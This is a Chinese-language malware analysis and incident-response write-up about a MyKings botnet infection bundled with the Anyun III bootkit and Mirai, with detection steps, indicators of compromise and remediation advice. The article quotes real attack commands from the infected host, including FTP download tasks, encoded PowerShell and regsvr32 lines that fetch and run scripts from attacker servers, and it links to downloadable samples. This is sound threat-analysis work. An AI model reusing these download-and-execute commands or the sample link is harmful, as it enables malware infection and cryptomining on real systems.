當前位置:
首頁 > 新聞 > 暗雲III v3.0等多個病毒家族結伴來襲實戰分析

暗雲III v3.0等多個病毒家族結伴來襲實戰分析

新聞 02-13

知識點


MyKings


MyKings是一個大規模多重殭屍網路,並安裝門羅幣挖礦機,利用伺服器資源挖礦。


概述






















挖礦攻擊名稱

MyKings

涉及平台

 Windows平台

相關惡意代碼家族

 DDoS、Proxy、RAT、Mirai

攻擊入口

 通過掃描開放埠,利用漏洞和弱口令進行入侵

相關漏洞及編號

 永恆之藍

描述簡介

 MyKings 是一個由多個子殭屍網路構成的多重殭屍網路,2017 年 4 月底以來,該殭屍網路一直積極地掃描互聯網上 1433 及其他多個埠,並在滲透進入受害者主機後傳播包括 DDoS、Proxy、RAT、Miner 在內的多種不同用途的惡意代碼。

1.攻擊過程邏輯:


圖-攻擊過程



圖-Payload執行過程


2.病毒各部分功能:



















文件名 功能
c.bat 關閉埠
item.dat 遠控木馬主體DLL
J腳本(硬編碼在Payload中) 結束指定進程,刪除文件,運行item.dat
cmd批處理腳本(Payload聯網獲取到內存中) 結束指定進程,刪除文件,刪除指定賬戶運行c.bat 、item.dat

表-各部分功能


排查思路


1.攻擊者利用SQL Server 弱密碼進行暴力入侵方式入侵Windows系統後,會植入木馬下載器conhost.exe(原始文件名ups.exe),該程序啟動後會首先訪問惡意鏈接http://ok.mymyxmra.ru以獲取第二階段惡意代碼的下載地址。 


根據C:/Windows/System32/b.txt產生的老的連接狀態日誌發現有大量外發掃描1433埠判斷可能是通過SQL Server弱密碼進來的。



C:/Windows/Temp/conhost.exe源始文件名ups.exe:

2.查找異常進程



3.查找異常服務


服務名xWinWpdSrv


映像路徑C:/Windows/system/msinfo.exe -s -syn 1000



掃描目標IP地址:生成機制越來越複雜



早期版本中, msinfo.exe用來掃描的目標IP只有兩種:從雲端配置文件wpd.dat獲取、在本地根據外網出口IP隨機生成;


最新樣本中,增加了一種更複雜的本地隨機生成演算法,並且會避開一批保留地址段。

核心木馬msinfo.exe用到的雲端配置文件wpd.dat ,是一個加密的XML文檔,其中指定了暴破成功後用到來下載Mirai樣本的C2地址、需要掃描的網路服務埠、暴破各個埠所需的口令、入侵各個網路服務時執行的部分命令以及需要掃描的目標IP範圍等配置。這些配置都可以根據後繼殭屍網路的要求靈活更改。


模塊化編程架構的msinfo.exe:主要是其Crack模塊中通過繼承一個基類TaskCrack,實現其中定義好的一組連接、暴破、執行命令等功能的函數介面即可定義一個TaskCrack_XXX子類,繼而實現針對一個新的網路服務的攻擊模塊Crack模塊與wpd.dat配置文件中定義的待掃描網路服務埠相對應,可以靈活更改針對不同網路服務的Crack功能。


其他輔助雲端配置文件:msinfo.exe用到的另外一個輔助木馬ups.exe ,會涉及其它雲端配置文件。這些也都可以靈活配置,方便攻擊者控制在下一階段需要下載什麼樣本、執行什麼樣的命令。


4.查找異常計劃任務                                         


| 名稱 | 啟動程序  | 觸發器 | | --- | --- | --- | | my1 | c:/windows/system/my1.bat  | 每天12點執行 | | Mysa | cmd.exe >/c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:windowsupdate.exe>>s&echo bye  | 系統啟動執行 | | Mysa1 | rundll32.exe c:windowsdebugitem.dat,ServiceMain aaaa | 系統啟動執行 | | Mysa2 | cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:windowsdebugitem.dat>>p&echo bye>>p&ftp -s:p | 系統啟動執行 | | ok | rundll32.exe c:windowsdebugok.dat,ServiceMain aaaa | 系統啟動執行 |




載入遠控木馬:


5.查找異常啟動項


6.查找異常防火牆和本地安全策略    



木馬文件配置防火牆策略,關閉135、137、138、139、445埠,防止再被其他病毒感染。



7.查找異常目錄&文件


C:/Windows/debug目錄,門羅幣挖礦相關的模塊和配置文件:



門羅幣配置config.json


礦池url:"pool.minexmr.com:5555"


錢包地址:

4862mTLmCo9LGqn3XUrV9xaEfzgNPid7AM26XpeWWm4nfEtPfV9Eb1k2xYaYWRyM6LYETJkF3RCqF5JX5dQWEi3hNNE36C6

pass:"x"



C:/Windows/Help目錄:


C:/Windows/system目錄。


msinfo.exe病毒母體通過註冊服務&寫入惡意代碼到資料庫的手段,實現持久化攻擊,會連接雲端,自動更新病毒,實時下載最新的攻擊模塊。


C:/Windows/system32系統命令目錄。


b.txt 埠連接狀態;


a.exe主要功能是實現清除可疑木馬進程和啟動DiskWriter遠控木馬item.dat;


csrse.exe原始文件ups.exe:


C:/Windows/Temp臨時文件目錄,被注入的病毒代碼執行惡意邏輯主要參照從C&C伺服器請求到的配置文件,該文件釋放到本地後路徑為:%SystemRoot%Temp
tuser.dat。該文件被異或0x95加密過,在使用該文件時會對文件進行解密。



解密後的ntuser.dat配置內容,如下圖所示:



ntuser.dat配置內容總體分為兩個部分:main和update。main部分中的所有ip和網址用來下載後門病毒相關配置,update部分中的ip和網址用來更新ntuser.dat配置數據,請求到的相關配置信息至今依然在持續更新。下載後門病毒配置信息cloud.txt的代碼邏輯。


下載後門病毒配置信息


請求到的配置信息中,除後門病毒下載地址(exe鍵名對應數據)外,還有名為url的配置項,該功能開啟後會hook CreateProcessW劫持瀏覽器啟動參數,但現階段該功能尚未被開啟。配置信息,如下圖所示:



配置信息


惡意代碼會通過上圖中的下載地址,將後門病毒下載到%SystemRoot%Tempconhost.exe目錄進行執行。下載執行遠程後門病毒相關邏輯。

下載執行後門病毒

Backdoor/Voluminer

該病毒運行後,首先會釋放存放有C&C伺服器列表的文件(xp.dat)至C:Program FilesCommon Files目錄中,之後向C&C伺服器列表中的伺服器地址請求xpxmr.dat文件,用於更新C&C伺服器列表。請求到的xpxmr.dat文件數據使用RSA演算法進行過加密,進行解密後會重新寫入到xpxmr.dat文件中,該文件為明文存放。


更新C&C伺服器列表


病毒在運行中會向C&C伺服器請求獲取最新病毒版本號,當檢測到存在新版本時,則會通過C&C伺服器下載執行最新版本的病毒程序。當後門病毒發現當前系統為64位系統時,還會向C&C伺服器請求64位版本的後門病毒到本地進行執行。


請求64位版本病毒


隨後,病毒會使用地址列表中的C&C伺服器地址下載挖礦所需的病毒組件,暫時我們發現會被病毒下載至本地病毒僅具有挖礦功能,但我們不排除其將來會下載其他病毒模塊的可能性。病毒在下載文件後,會對病毒組件進行md5校驗,病毒組件的md5值會參考C&C伺服器中的md5.txt文件內容。


在該目錄下有個以本機ip命名的txt文件


內容如下 :         

--------------------------------------------------------         路徑:C:WindowsTempconhost.exe命令行:C:WindowsTempconhost.exe                      路徑:C:WindowsSysWOW64cmd.exe命令行:cmd /c ""C:windowswebc3.bat" "路徑:C:WindowsSysWOW64cacls.exe命令行:cacls  c:windows empdocv8.exe/e /d system路徑:C:Windowssystem32csrse.exe命令行:"C:Windowssystem32csrse.exe" 路徑:c:windowssystemmsinfo.exe命令行:c:windowssystemmsinfo.exe -s -syn 1000路徑:c:windowsdebuglsmo.exe命令行:c:windowsdebuglsmo.exe 路徑:C:WindowsSystem32cmd.exe命令行:"C:WindowsSystem32cmd.exe" /C ping 127.0.0.1 -n 6 & taskkill -f /im lsmose.exe & c:windowsdebuglsmose.exe路徑:c:windowsdebuglsmose.exe命令行:c:windowsdebuglsmose.exe路徑:C:Windowssystem32cmd.exe命令行:cmd /c powershell.exe -nop -enc JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAA6ADgAOAA4ADgALwAyAC4AdAB4AHQAIgApAC4AdAByAGkAbQAoACkAIAAtAHMAcABsAGkAdAAgACIAWwBcAHIAXABuAF0AKwAiAHwAJQB7ACQAbgA9ACQAXwAuAHMAcABsAGkAdAAoACIALwAiACkAWwAtADEAXQA7ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAF8ALAAgACQAbgApADsAcwB0AGEAcgB0ACAAJABuADsAfQA=&powershell.exe    IEX (New-Object system.Net.WebClient).DownloadString("http://wmi.1217bye.host:8888/S.ps1")&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString("http://173.208.139.170/s.txt")&powershell.exe    IEX (New-Object system.Net.WebClient).DownloadString("http://35.182.171.137/s.jpg")||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32    /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll路徑:C:WindowsSystem32WindowsPowerShellv1.0powershell.exe命令行:powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString("http://173.208.139.170/s.txt")--------------------------------------------

備註


載入遠控木馬,64base編碼解碼後得到:

$ w c = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ w c . D o w n l o a d S t r i n g ( " h t t p : / / w m i . 1 2 1 7 b y e . h o s t : 8 8 8 8 / 2 . t x t " ) . t r i m ( )   - s p l i t   " [ r     n ] + " | % { $ n = $ _ . s p l i t ( " / " ) [ - 1 ] ; $ w c . D o w n l o a d F i l e ( $ _ ,   $ n ) ; s t a r t   $ n ; } 

利用regsvr32執行遠程腳本命令  /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll 該txt文件為一個遠程js腳本,js腳本里的字元都被用16進位進行替換,解密後的js腳本,其主要功能是下載木馬文件並執行。


解密後的遠程腳本,Upsnew2釋放遠控木馬item.dat以及c3.bat腳本。


C:WindowsSystem32configsystemprofileAppDataLocalMicrosoftWindowsTemporary Internet FilesContent.IE5DV6W313X   

ie臨時文件目錄下upsnew2[1].exe,原始文件名ups.exe:


txt最下面是用mimikatz獲得的系統明文密碼:




下載Invoke-Mimikatz.ps1腳本:


要結束的進程列表:



C:/Windows/Web目錄:c3.bat腳本功能如下:



C:Program FilesCommon Files目錄下:


C:/Program Files/目錄下:


C:/Windows/SysWOW64目錄下,wpd.dat掃描的目標IP從雲端配置文件:



C:/Windows/taidbox/mbrbackup.bin,暗雲III v3.0:




暗雲III v3.0其線程回調常式執行流程如下:


a)調用RtlInitUnicodeString初始化csrss.exe;


b)查找進程csrss.exe,檢測到csrss.exe後則繼續下一步;


c)感染MBR,並保護1到62扇區的數據,如果試圖讀前62扇區的數據則會返回正常的數據,如果試圖寫前62扇區的數據則返回寫入的數據進行欺騙,實際沒有被寫入;


d)調用CreateSystemThread創建系統線程,該線程函數主要完成了shellcode下載執行等功能,可拉取任意功能惡意代碼進行執行。


解決方案


1.隔離感染主機:已中毒計算機儘快隔離,關閉所有網路連接,禁用網卡;


2.切斷傳播途徑:從殭屍網路當前的攻擊重點來看,防範其通過1433埠入侵計算機是非常有必要的。此外,Bot程序還有多種攻擊方式尚未使用,這些攻擊方式可能在未來的某一天被開啟,因此也需要防範可能發生的攻擊;


3.查找攻擊源:加固SQL Server伺服器,修補伺服器安全漏洞。使用安全的密碼策略,使用高強度密碼,切勿使用弱口令,防止黑客暴力破解,禁用sa賬號;


4.查殺病毒:使用管家急救箱進行查殺,下載網址:


http://dlied6.qq.com/invc/xfspeed/qqpcmgr/other/SystemAidBoxPro.zip ;


5.修補漏洞:特別注意445埠的開放情況,如果不需要使用Windows區域網共享服務,可以通過設置防火牆規則來關閉445等埠,並及時打上永恆之藍MS17-010等漏洞相關補丁;


6.注意MSSQL,RDP,Telnet等服務的弱口令問題;


7.注意系統賬戶情況,禁用不必要的賬戶。


參考


1.具備多病毒功能!MiraiXMiner物聯網殭屍網路攻擊來襲


https://www.freebuf.com/articles/terminal/191303.html


2.惡意挖礦攻擊的現狀、檢測及處置


https://www.freebuf.com/articles/system/189454.html


3.MyKings:一個大規模多重殭屍網路


https://www.freebuf.com/articles/network/161286.html 


4.【木馬分析】悄然崛起的挖礦機殭屍網路:打伺服器挖價值百萬門羅幣


https://www.anquanke.com/post/id/86751 


5.MyKings殭屍網路最新變種突襲,攻擊代碼多次加密混淆,難以檢測 


https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw


6.弱口令爆破SQL Server伺服器 暗雲、Mykings、Mirai多個病毒家族結伴來襲 


https://www.freebuf.com/column/193260.html


7.暗雲系列Bootkit木馬最新動態


https://www.freebuf.com/column/187489.html


8.MyKing黑產團伙最新挖礦活動曝光 


https://x.threatbook.cn/nodev4/vb4/article?threatInfoID=936


9.中國黑客利用「永恆之藍」搜刮肉雞構建殭屍網路 


www.sohu.com/a/144223631_765820


10.殭屍網路「Mykings」 


www.voidcn.com/article/p-xdbozctv-brp.html


11.「隱匿者」病毒團伙技術升級傳播病毒 暴力入侵電腦威脅全網用戶 


https://www.secpulse.com/archives/75273.html


12.徹底曝光黑客組織「隱匿者」:目前作惡最多的網路攻擊團伙 


www.4hou.com/info/news/6838.html


13.代碼戰爭的主陣地——來自終端的威脅情報詳述.pdf 


www.studylead.com/p-7400580.html


14.【木馬分析】分析利用「永恆之藍」漏洞傳播的RAT 


https://www.anquanke.com/post/id/86822 


域名

127.0.0.1  ftp.ftp0930.host127.0.0.1  pool.minexmr.com127.0.0.1  raw.githubusercontent.com127.0.0.1  wmi.1217bye.host127.0.0.1  down.mysking.info127.0.0.1  js.ftp0930.host127.0.0.1  js.mykings.top127.0.0.1  ftp.ftp0118.info127.0.0.1  ok.mymyxmra.ru    127.0.0.1  mbr.kill0604.ru

ip

173.208.139.17035.182.171.137    45.58.135.106    103.213.246.2378.142.29.15274.222.14.6118.218.14.96223.25.247.240223.25.247.152103.95.28.5423.88.160.137    81.177.135.35    78.142.29.110    174.128.239.250    66.117.6.174

暗雲III v3.0 、Mykings、Mirai木馬樣本已放到網盤供學習。


鏈接:https://pan.baidu.com/s/14Hqb3IrjvAqykJSsgKk5Rw 


提取碼:3uoq 


*

本文作者:xuchen16,轉載請註明來自FreeBuf.COM


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 FreeBuf 的精彩文章:

看我如何通過ASP Secrets讀取獲得了1.7萬美金的漏洞獎勵
從Linux到Windows的PowerShell遠程處理

TAG:FreeBuf |